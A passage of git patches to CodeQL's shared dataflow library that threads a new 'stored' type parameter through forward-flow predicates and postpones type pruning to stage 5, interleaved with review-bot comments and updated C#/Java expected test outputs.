pragma[only_bind_into](argApa), ap) and + pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), + pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, allowsFieldFlow, argApa) and fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), - pragma[only_bind_into](argApa)) and + pragma[only_bind_into](argApa), pragma[only_bind_into](argStored)) and if allowsFieldFlow = false then argAp instanceof ApNil else any() ) } 
@@ -2168,7 +2208,7 @@ module MakeImpl Lang> { ) { exists(ApApprox apa, boolean allowsFieldFlow | flowIntoCallApaTaken(call, c, arg, p, allowsFieldFlow, apa) and - fwdFlow(arg, _, _, _, _, ap, apa) and + fwdFlow(arg, _, _, _, _, ap, apa, _) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) } @@ -2180,7 +2220,7 @@ module MakeImpl Lang> { ) { exists(ApApprox apa, boolean allowsFieldFlow | PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow, apa) and - fwdFlow(ret, _, _, _, _, ap, apa) and + fwdFlow(ret, _, _, _, _, ap, apa, _) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() | @@ -2203,14 +2243,14 @@ module MakeImpl Lang> { NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { revFlow0(node, state, returnCtx, returnAp, ap) and - fwdFlow(node, state, _, _, _, ap, _) + fwdFlow(node, state, _, _, _, ap, _, _) } pragma[nomagic] private predicate revFlow0( NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { - fwdFlow(node, state, _, _, _, ap, _) and + fwdFlow(node, state, _, _, _, ap, _, _) and sinkNode(node, state) and ( if hasSinkCallCtx() @@ -2261,7 +2301,7 @@ module MakeImpl Lang> { // flow out of a callable exists(ReturnPosition pos | revFlowOut(_, node, pos, state, _, _, _, ap) and - if returnFlowsThrough(node, pos, state, _, _, _, _, _, ap) + if returnFlowsThrough(node, pos, state, _, _, _, _, _, _, ap) then ( returnCtx = TReturnCtxMaybeFlowThrough(pos) and returnAp = apSome(ap) @@ -2338,7 +2378,7 @@ module MakeImpl Lang> { predicate dataFlowNonCallEntry(DataFlowCallable c, boolean cc) { exists(NodeEx node, FlowState state, ApNil nil | - fwdFlow(node, state, _, _, _, nil, _) and + fwdFlow(node, state, _, _, _, nil, _, _) and sinkNode(node, state) and (if hasSinkCallCtx() then cc = true else cc = false) and c = node.getEnclosingCallable() 
@@ -2423,7 +2463,7 @@ module MakeImpl Lang> { ) { exists(RetNodeEx ret, FlowState state, CcCall ccc | revFlowOut(call, ret, pos, state, returnCtx, _, returnAp, ap) and - returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, ap) and + returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, _, ap) and matchesCall(ccc, call) ) } @@ -2492,7 +2532,7 @@ module MakeImpl Lang> { pragma[nomagic] predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap) { exists(ReturnPosition pos | - returnFlowsThrough(_, pos, _, _, p, _, ap, _, _) and + returnFlowsThrough(_, pos, _, _, p, _, ap, _, _, _) and parameterFlowsThroughRev(p, ap, pos, _) ) } @@ -2502,7 +2542,7 @@ module MakeImpl Lang> { exists(Ap ap0 | parameterMayFlowThrough(p, _) and revFlow(n, state, TReturnCtxMaybeFlowThrough(_), _, ap0) and - fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap), _, ap0, _) + fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap, _), _, ap0, _, _) ) } @@ -2521,7 +2561,7 @@ module MakeImpl Lang> { pragma[nomagic] predicate returnMayFlowThrough(RetNodeEx ret, Ap argAp, Ap ap, ReturnKindExt kind) { exists(ParamNodeEx p, ReturnPosition pos | - returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, ap) and + returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, _, ap) and parameterFlowsThroughRev(p, argAp, pos, ap) and kind = pos.getKind() ) @@ -2795,8 +2835,11 @@ module MakeImpl Lang> { */ additional module Graph { private newtype TPathNode = - TPathNodeMid(NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap) { - fwdFlow(node, state, cc, summaryCtx, t, ap, _) and + TPathNodeMid( + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, + TypOption stored + ) { + fwdFlow(node, state, cc, summaryCtx, t, ap, _, stored) and revFlow(node, state, _, _, ap) } or TPathNodeSink(NodeEx node, FlowState state) { 
@@ -2937,8 +2980,9 @@ module MakeImpl Lang> { SummaryCtx summaryCtx; Typ t; Ap ap; + TypOption stored; - PathNodeMid() { this = TPathNodeMid(node, state, cc, summaryCtx, t, ap) } + PathNodeMid() { this = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) } override NodeEx getNodeEx() { result = node } @@ -3006,6 +3050,12 @@ module MakeImpl Lang> { ) } + private string ppStored() { + exists(string ppt | ppt = stored.toString() | + if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt + ) + } + private string ppCtx() { result = " <" + cc + ">" } private string ppSummaryCtx() { @@ -3015,7 +3065,9 @@ module MakeImpl Lang> { result = " <" + summaryCtx + ">" } - override string toString() { result = node.toString() + this.ppType() + this.ppAp() } + override string toString() { + result = node.toString() + this.ppType() + this.ppAp() + this.ppStored() + } /** * Gets a textual representation of this element, including a textual @@ -3023,7 +3075,8 @@ module MakeImpl Lang> { */ string toStringWithContext() { result = - node.toString() + this.ppType() + this.ppAp() + this.ppCtx() + this.ppSummaryCtx() + node.toString() + this.ppType() + this.ppAp() + this.ppStored() + this.ppCtx() + + this.ppSummaryCtx() } override predicate isSource() { 
@@ -3093,41 +3146,43 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInStep( ArgNodeEx arg, ParamNodeEx p, FlowState state, Cc outercc, CcCall innercc, - SummaryCtx outerSummaryCtx, SummaryCtx innerSummaryCtx, Typ t, Ap ap + SummaryCtx outerSummaryCtx, SummaryCtx innerSummaryCtx, Typ t, Ap ap, TypOption stored ) { FwdFlowInNoThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, _) and + ap, _, stored, _) and innerSummaryCtx = TSummaryCtxNone() or FwdFlowInThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, _) and - innerSummaryCtx = TSummaryCtxSome(p, state, t, ap) + ap, _, stored, _) and + innerSummaryCtx = TSummaryCtxSome(p, state, t, ap, stored) } pragma[nomagic] private predicate fwdFlowThroughStep0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa ) { - fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, ret, innerSummaryCtx, - innerArgApa) + fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, + innerSummaryCtx, innerArgApa) } - bindingset[node, state, cc, summaryCtx, t, ap] + bindingset[node, state, cc, summaryCtx, t, ap, stored] pragma[inline_late] private PathNodeImpl mkPathNode( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, + TypOption stored ) { - result = TPathNodeMid(node, state, cc, summaryCtx, t, ap) + result = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) } private PathNodeImpl typeStrengthenToPathNode( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, + TypOption stored ) { 
exists(Typ t | - fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, _) and - result = TPathNodeMid(node, state, cc, summaryCtx, t, ap) + fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, _, stored) and + result = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) ) } 
@@ -3135,32 +3190,34 @@ module MakeImpl Lang> { private predicate fwdFlowThroughStep1( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - RetNodeEx ret, ApApprox innerArgApa + TypOption stored, RetNodeEx ret, ApApprox innerArgApa ) { exists( FlowState state0, ArgNodeEx arg, SummaryCtxSome innerSummaryCtx, ParamNodeEx p, - Typ innerArgT, Ap innerArgAp + Typ innerArgT, Ap innerArgAp, TypOption innerArgStored | - fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, ret, + fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, innerSummaryCtx, innerArgApa) and - innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp) and - pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp) and - pn2 = typeStrengthenToPathNode(p, state0, ccc, innerSummaryCtx, innerArgT, innerArgAp) and - pn3 = mkPathNode(ret, state, ccc, innerSummaryCtx, t, ap) + innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp, innerArgStored) and + pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp, innerArgStored) and + pn2 = + typeStrengthenToPathNode(p, state0, ccc, innerSummaryCtx, innerArgT, innerArgAp, + innerArgStored) and + pn3 = mkPathNode(ret, state, ccc, innerSummaryCtx, t, ap, stored) ) } pragma[nomagic] private predicate fwdFlowThroughStep2( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, NodeEx node, Cc cc, - FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap + FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { exists( DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, ApApprox innerArgApa, ApApprox apa | - fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, apa, ret, - innerArgApa) and + fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, apa, + stored, ret, innerArgApa) and 
flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -3169,10 +3226,10 @@ module MakeImpl Lang> { private predicate localStep( PathNodeImpl pn1, NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, - Ap ap, string label, boolean isStoreStep + Ap ap, TypOption stored, string label, boolean isStoreStep ) { exists(NodeEx mid, FlowState state0, Typ t0, LocalCc localCc | - pn1 = TPathNodeMid(mid, state0, cc, summaryCtx, t0, ap) and + pn1 = TPathNodeMid(mid, state0, cc, summaryCtx, t0, ap, stored) and localCc = getLocalCc(cc) and isStoreStep = false | @@ -3184,18 +3241,18 @@ module MakeImpl Lang> { ) or // store - exists(NodeEx mid, Content c, Typ t0, Ap ap0 | - pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and - fwdFlowStore(mid, t0, ap0, c, t, node, state, cc, summaryCtx) and + exists(NodeEx mid, Content c, Typ t0, Ap ap0, TypOption stored0 | + pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0, stored0) and + fwdFlowStore(mid, t0, ap0, stored0, c, t, stored, node, state, cc, summaryCtx) and ap = apCons(c, ap0) and label = "" and isStoreStep = true ) or // read - exists(NodeEx mid, Typ t0, Ap ap0 | - pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and - fwdFlowRead(mid, t0, ap0, _, node, t, ap, state, cc, summaryCtx) and + exists(NodeEx mid, Typ t0, Ap ap0, TypOption stored0 | + pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0, stored0) and + fwdFlowRead(mid, t0, ap0, stored0, _, node, t, ap, stored, state, cc, summaryCtx) and label = "" and isStoreStep = false ) 
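Review bot: In the store and read disjuncts of `localStep`, `stored0` and `stored` are both `TypOption` and are passed positionally, so swapping them would still type-check. The two calls also place them differently: `fwdFlowStore(mid, t0, ap0, stored0, c, t, stored, node, ...)` versus `fwdFlowRead(mid, t0, ap0, stored0, _, node, t, ap, stored, ...)`. A short comment on each call, such as `// stored0: value at mid (before the step); stored: value at node (after it)`, would make the direction explicit. That reading is inferred from how `t0`/`ap0` are used in the same disjuncts. `localStep` begins in the preceding hunk, so its full signature is not visible here.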
@@ -3204,10 +3261,10 @@ module MakeImpl Lang> { private predicate localStep(PathNodeImpl pn1, PathNodeImpl pn2, string label) { exists( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, - boolean isStoreStep + TypOption stored, boolean isStoreStep | - localStep(pn1, node, state, cc, summaryCtx, t0, ap, label, isStoreStep) and - pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap) and + localStep(pn1, node, state, cc, summaryCtx, t0, ap, stored, label, isStoreStep) and + pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap, stored) and stepFilter(node, ap, isStoreStep) ) or @@ -3235,11 +3292,11 @@ module MakeImpl Lang> { private predicate nonLocalStep( PathNodeImpl pn1, NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, - Ap ap, string label + Ap ap, TypOption stored, string label ) { // jump exists(NodeEx mid, FlowState state0, Typ t0 | - pn1 = TPathNodeMid(mid, state0, _, _, t0, ap) and + pn1 = TPathNodeMid(mid, state0, _, _, t0, ap, stored) and cc = ccNone() and summaryCtx = TSummaryCtxNone() | 
@@ -3264,15 +3321,16 @@ module MakeImpl Lang> { or // flow into a callable exists(ArgNodeEx arg, Cc outercc, SummaryCtx outerSummaryCtx | - pn1 = TPathNodeMid(arg, state, outercc, outerSummaryCtx, t, ap) and - fwdFlowInStep(arg, node, state, outercc, cc, outerSummaryCtx, summaryCtx, t, ap) and + pn1 = TPathNodeMid(arg, state, outercc, outerSummaryCtx, t, ap, stored) and + fwdFlowInStep(arg, node, state, outercc, cc, outerSummaryCtx, summaryCtx, t, ap, + stored) and label = "" ) or // flow out of a callable exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow, ApApprox apa | - pn1 = TPathNodeMid(ret, state, innercc, summaryCtx, t, ap) and - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa) and + pn1 = TPathNodeMid(ret, state, innercc, summaryCtx, t, ap, stored) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and fwdFlowOutValidEdge(_, ret, innercc, _, node, cc, apa, allowsFieldFlow) and not inBarrier(node, state) and label = "" and @@ -3281,9 +3339,12 @@ module MakeImpl Lang> { } private predicate nonLocalStep(PathNodeImpl pn1, PathNodeImpl pn2, string label) { - exists(NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap | - nonLocalStep(pn1, node, state, cc, summaryCtx, t0, ap, label) and - pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap) and + exists( + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, + TypOption stored + | + nonLocalStep(pn1, node, state, cc, summaryCtx, t0, ap, stored, label) and + pn2 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap, stored) and stepFilter(node, ap, false) ) } 
@@ -3298,10 +3359,10 @@ module MakeImpl Lang> { ) { exists( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Ap ap, - PathNodeImpl out0 + TypOption stored, PathNodeImpl out0 | - fwdFlowThroughStep2(arg, par, ret, node, cc, state, summaryCtx, t0, ap) and - out0 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap) and + fwdFlowThroughStep2(arg, par, ret, node, cc, state, summaryCtx, t0, ap, stored) and + out0 = typeStrengthenToPathNode(node, state, cc, summaryCtx, t0, ap, stored) and stepFilter(node, ap, false) | out = out0 or out = out0.(PathNodeMid).projectToSink(_) @@ -3573,14 +3634,13 @@ module MakeImpl Lang> { int tfnodes, int tftuples ) { fwd = true and - nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _)) and + nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _, _)) and fields = count(Content f0 | fwdConsCand(f0, _)) and conscand = count(Content f0, Ap ap | fwdConsCand(f0, ap)) and - states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _)) and + states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _, _)) and tuples = - count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap | - fwdFlow(n, state, cc, summaryCtx, t, ap, _) - ) and + count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, + TypOption stored | fwdFlow(n, state, cc, summaryCtx, t, ap, _, stored)) and calledges = count(DataFlowCall call, DataFlowCallable c | FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll index 75d68cf247c..4016199ccec 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImplCommon.qll 
@@ -891,6 +891,8 @@ module MakeImplCommon Lang> { nodeDataFlowType(this.asNode(), result) or nodeDataFlowType(this.asParamReturnNode(), result) + or + isTopType(result) and this.isImplicitReadNode(_) } pragma[inline] From b65a4e45ab00cb5422821675c5c1a3cb3c5f36b3 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Fri, 22 Nov 2024 10:18:32 +0100 Subject: [PATCH 0775/1267] Dataflow: Postpone type pruning until stage 5. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 1076957db5e..6c91017ee8a 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -3931,7 +3931,7 @@ module MakeImpl Lang> { private module Stage4Param implements MkStage::StageParam { private module PrevStage = Stage3; - class Typ = DataFlowType; + class Typ = Unit; class Ap = AccessPathFront; @@ -3939,7 +3939,7 @@ module MakeImpl Lang> { PrevStage::Ap getApprox(Ap ap) { result = ap.toApprox() } - Typ getTyp(DataFlowType t) { result = t } + Typ getTyp(DataFlowType t) { any() } bindingset[c, tail] Ap apCons(Content c, Ap tail) { result.getHead() = c and exists(tail) } @@ -3964,9 +3964,10 @@ module MakeImpl Lang> { NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue, Typ t, LocalCc lcc, string label ) { - Stage3Param::localFlowBigStep(node1, state1, node2, state2, preservesValue, t, _, label) and + Stage3Param::localFlowBigStep(node1, state1, node2, state2, preservesValue, _, _, label) and PrevStage::revFlow(node1, pragma[only_bind_into](state1), _) and PrevStage::revFlow(node2, pragma[only_bind_into](state2), _) and + exists(t) and exists(lcc) } 
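Review bot: The added disjunct `isTopType(result) and this.isImplicitReadNode(_)` gives every implicit read node the top type, but no comment says why these nodes need a type at all or why the top type is the right one. A line above it, such as `// implicit read nodes have no underlying node to take a type from, so use the top type`, would record the intent if that is indeed the reason. The enclosing predicate starts outside this hunk, so the other disjuncts are only partly visible.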
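Review bot: `Stage4Param` now has `class Typ = Unit;` and `Typ getTyp(DataFlowType t) { any() }`, and the later hunks reduce `filter` to `t0 = t` and `typecheck` to `any()`, but nothing in the code marks these as deliberate no-ops. The only explanation is the commit subject, which is not visible to someone reading the module later. A comment above `class Typ = Unit;`, such as `// Types are not tracked in this stage; type pruning is postponed until stage 5.`, would record it. The added `exists(t)` in `localFlowBigStep` could carry `// t is Unit here; this only binds the column`. Presumably type-based filtering of results now depends entirely on the later stage, and that dependency is worth stating where the checks were removed.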
@@ -4015,7 +4016,7 @@ module MakeImpl Lang> { predicate filter(NodeEx node, FlowState state, Typ t0, Ap ap, Typ t) { exists(state) and not clear(node, ap) and - strengthenType(node, t0, t) and + t0 = t and ( notExpectsContent(node) or @@ -4029,7 +4030,7 @@ module MakeImpl Lang> { } bindingset[t1, t2] - predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } + predicate typecheck(Typ t1, Typ t2) { any() } } private module Stage4 = MkStage::Stage; From 9734cff15b4c435ba97e3a1698ee9a0eae789d24 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 3 Dec 2024 12:57:44 +0100 Subject: [PATCH 0776/1267] Java/C#: Update expected files. --- .../collections/CollectionFlow.expected | 10 +- .../dataflow/fields/FieldFlow.expected | 24 +- .../dataflow/global/DataFlowPath.expected | 6 +- .../global/TaintTrackingPath.expected | 6 +- .../dataflow/capture/inlinetest.expected | 144 +-- .../frameworks/android/intent/test.expected | 1009 ----------------- .../android/notification/test.expected | 80 -- 7 files changed, 95 insertions(+), 1184 deletions(-) diff --git a/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected b/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected index 18155300ff0..d6b79d7ae6b 100644 --- a/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected +++ b/csharp/ql/test/library-tests/dataflow/collections/CollectionFlow.expected 
@@ -249,9 +249,9 @@ edges | CollectionFlow.cs:308:9:308:12 | [post] access to local variable list : List [element, property Key] : A | CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | provenance | | | CollectionFlow.cs:308:18:308:47 | object creation of type KeyValuePair : KeyValuePair [property Key] : A | CollectionFlow.cs:308:9:308:12 | [post] access to local variable list : List [element, property Key] : A | provenance | MaD:3 | | CollectionFlow.cs:308:43:308:43 | access to local variable a : A | CollectionFlow.cs:308:18:308:47 | object creation of type KeyValuePair : KeyValuePair [property Key] : A | provenance | MaD:13 | -| CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | provenance | MaD:18 | -| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | provenance | | -| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:24 | access to property Key | provenance | | +| CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | provenance | MaD:18 | +| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | provenance | | +| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | CollectionFlow.cs:311:18:311:24 | access to property Key | provenance | | | CollectionFlow.cs:328:32:328:38 | element : A | CollectionFlow.cs:328:55:328:61 | access to parameter element : A | provenance | | | CollectionFlow.cs:328:44:328:48 | [post] access to parameter array 
: A[] [element] : A | CollectionFlow.cs:328:23:328:27 | array [Return] : A[] [element] : A | provenance | | | CollectionFlow.cs:328:55:328:61 | access to parameter element : A | CollectionFlow.cs:328:44:328:48 | [post] access to parameter array : A[] [element] : A | provenance | | @@ -559,8 +559,8 @@ nodes | CollectionFlow.cs:308:18:308:47 | object creation of type KeyValuePair : KeyValuePair [property Key] : A | semmle.label | object creation of type KeyValuePair : KeyValuePair [property Key] : A | | CollectionFlow.cs:308:43:308:43 | access to local variable a : A | semmle.label | access to local variable a : A | | CollectionFlow.cs:309:9:309:12 | access to local variable list : List [element, property Key] : A | semmle.label | access to local variable list : List [element, property Key] : A | -| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | semmle.label | kvp : KeyValuePair [property Key] : A | -| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | semmle.label | access to parameter kvp : KeyValuePair [property Key] : A | +| CollectionFlow.cs:309:21:309:23 | kvp : KeyValuePair [property Key] : A | semmle.label | kvp : KeyValuePair [property Key] : A | +| CollectionFlow.cs:311:18:311:20 | access to parameter kvp : KeyValuePair [property Key] : A | semmle.label | access to parameter kvp : KeyValuePair [property Key] : A | | CollectionFlow.cs:311:18:311:24 | access to property Key | semmle.label | access to property Key | | CollectionFlow.cs:328:23:328:27 | array [Return] : A[] [element] : A | semmle.label | array [Return] : A[] [element] : A | | CollectionFlow.cs:328:32:328:38 | element : A | semmle.label | element : A | diff --git a/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected b/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected index e4cf0bb2673..50fa7b06416 100644 --- a/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected 
+++ b/csharp/ql/test/library-tests/dataflow/fields/FieldFlow.expected 
@@ -812,10 +812,10 @@ edges | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | H.cs:33:19:33:19 | a : A [field FieldA] : Object | provenance | | | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | H.cs:106:16:106:40 | call to method Transform : B [field FieldB] : Object | provenance | | | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | H.cs:106:16:106:40 | call to method Transform : B [field FieldB] : Object | provenance | | -| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | provenance | | -| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | provenance | | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | +| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | provenance | | +| H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | provenance | | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | provenance | | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | H.cs:106:26:106:39 | (...) ... 
: A [field FieldA] : Object | provenance | | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | H.cs:113:31:113:31 | access to local variable a : A [field FieldA] : Object | provenance | | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | H.cs:113:31:113:31 | access to local variable a : A [field FieldA] : Object | provenance | | | H.cs:112:20:112:36 | call to method Source : Object | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | provenance | | 
@@ -908,14 +908,14 @@ edges | H.cs:165:17:165:27 | (...) ... : B | H.cs:165:13:165:13 | access to local variable b : B | provenance | | | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | H.cs:165:13:165:13 | access to local variable b : B [field FieldB] : Object | provenance | | | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | H.cs:165:13:165:13 | access to local variable b : B [field FieldB] : Object | provenance | | -| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | provenance | | -| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | provenance | | +| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | provenance | | +| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | provenance | | | H.cs:165:20:165:20 | access to local variable a : A [field FieldA] : B | H.cs:165:20:165:27 | access to field FieldA : B | provenance | | | H.cs:165:20:165:20 | access to local variable a : A [field FieldA] : B | H.cs:165:20:165:27 | access to field FieldA : B | provenance | | | H.cs:165:20:165:27 | access to field FieldA : B | H.cs:165:17:165:27 | (...) ... : B | provenance | | | H.cs:165:20:165:27 | access to field FieldA : B | H.cs:165:17:165:27 | (...) ... : B | provenance | | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... 
